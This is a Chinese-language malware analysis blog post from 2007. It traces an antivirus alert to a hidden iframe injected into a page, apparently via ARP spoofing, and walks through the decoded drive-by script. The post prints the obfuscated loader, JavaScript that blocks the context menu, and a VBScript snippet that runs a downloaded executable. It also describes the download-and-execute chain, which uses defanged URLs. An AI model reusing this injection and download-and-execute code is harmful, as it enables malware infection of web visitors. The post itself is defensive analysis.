endurer 原创
2007-06-03 第1版
电脑开机进入桌面后,瑞星自动开始扫描,随即报告 C:/DOCUME~1/ADMINI~1/LOCALS~1/Temp/124161561552.tmp 感染 Trojan.DL.VBS.Agent.cns
经检查,打开其它网站的网页,没有问题,但只要打开瑞星杀毒程序就会报毒。
仔细一看瑞星杀软的信息中心,发现居然是:毒软件2007版--信息中心!
检查瑞星杀软的信息中心网页的代码,发现
/---
<iframe src="hxxp://nx.vod***336*9.cn/count.htm" width="100" height="0" frameborder="0"></iframe><html>毒软件2007版--信息中心</title>
---/
count.htm 的内容是JavaScript脚本代码:
/---
wA73='Q\(V\-B\"\'8pM\rc\^\,lqe\;\$E\*\&\@1DH\+5tbOa\)i3\#g9h\.SCX\}2o\?nzf6NkKAP\]\n\~Is7\_GmLJy4\%vU\ YFj\|\/\:\>0\!\`\[W\{udr\<\\ZRxwT\=',pY53='0An\}\%\"\{B\]\ ut\^\_\/D\~9G\`vh6Mm\<\,RIrEiyCg\:8\>YTF\nb5\'\.\$q\\UJz\rx4LsSQd\!fw\#kW1\?\)\|\+VpH\[3jO\=e2PX\&\(coN7l\@\*Ka\;Z\-';function kN75(dO67){"2……(略)……kN75("\@……(略)……f\^lg\ r2tQtQ")
---/
解密后的内容为 JavaScript 和 VBScript代码,与以前 Viking所用的网页传播代码很相似。
共分三个部分。
第一部分的JavaScript 代码 定义了一些变量,并使用定时器来禁用右键菜单:
/---
<script language=javascript>jS59=4837;if(document.all){function _dm(){return false};function _mdm(){document.oncontextmenu=_dm;setTimeout("_mdm()",800)};_mdm();}document.oncontextmenu=new Function("return false");function _ndm(e){if(document.layers||window.sidebar){if(e.which!=1)return false;}};if(document.layers){document.captureEvents(Event.MOUSEDOWN);document.onmousedown=_ndm;}else{document.onmouseup=_ndm;};rZ11=9411;hX76=3412;function _dws(){window.status = " ";setTimeout("_dws()",100);};_dws();oN89=2839;uQ63=3409;function _dds(){if(document.all){document.onselectstart=function (){return false};setTimeout("_dds()",700)}};_dds();tD23=4552;iB88=8553;if(window.location.protocol.indexOf("file")!=-1)document.location="";zL93=1412;kE0=3694;kK97=9984;wQ44=1124;eX95=5698;bG77=2836;bL74=9126;;_licensed_to_="huyufeng";
---/
定义了一些变量,并使用定时器来禁用右键菜单。
接下来的 第二部分的JavaScript 代码:
/---
<SCRIPT>var Laoding="%3Chtml%3E%3Cscript language%3D%22VBScript%22%3E on error resume next%0D%0A";document.write(unescape(Laoding))</SCRIPT>
---/
输出用escape加密的VBScript脚本标记和出错控制。
第三部分的VBScript代码的功能是利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 及 Adodb.stream 下载文件 hxxp://www.qu*an**s*ou*8.cn/update3.exe,保存为 IE临时文件夹里的~324f43fg43t.CoM,创建 IE临时文件夹里的 ~WEDEWFEFEWE.VbS 和 c:\revbrev.EXE,内容为:
Set Shell = CreateObject("Wscript.Shell")
Shell.Run ("IE临时文件夹里的~324f43fg43t.CoM")
Set Shell = Nothing
然后通过 Shell.Application 对象 Run 的 ShellExecute 方法 来运行。
文件说明符 : D:\test\update3.exe
属性 : A---
语言 : 英语(美国)
文件版本 :
说明 :
版权 : (C) Microsoft Corporation. All rights reserved.
备注 :
产品版本 :
产品名称 : Microsoft(R) Windows(R) Operating System
公司名称 : Microsoft Corporation
合法商标 :
内部名称 :
源文件名 :
创建时间 : 2007-6-3 22:4:49
修改时间 : 2007-6-3 22:4:50
访问时间 : 2007-6-3 0:0:0
大小 : 16663 字节 16.279 KB
MD5 : eaf1b6a015c03e50511f2fb35a8d8262
|
Scanned file: update3.exe - Infected |
update3.exe - infected by Trojan-Downloader.Win32.Agent.bsb Statistics:
|
怀疑是局域网里又有电脑中ARP病毒了。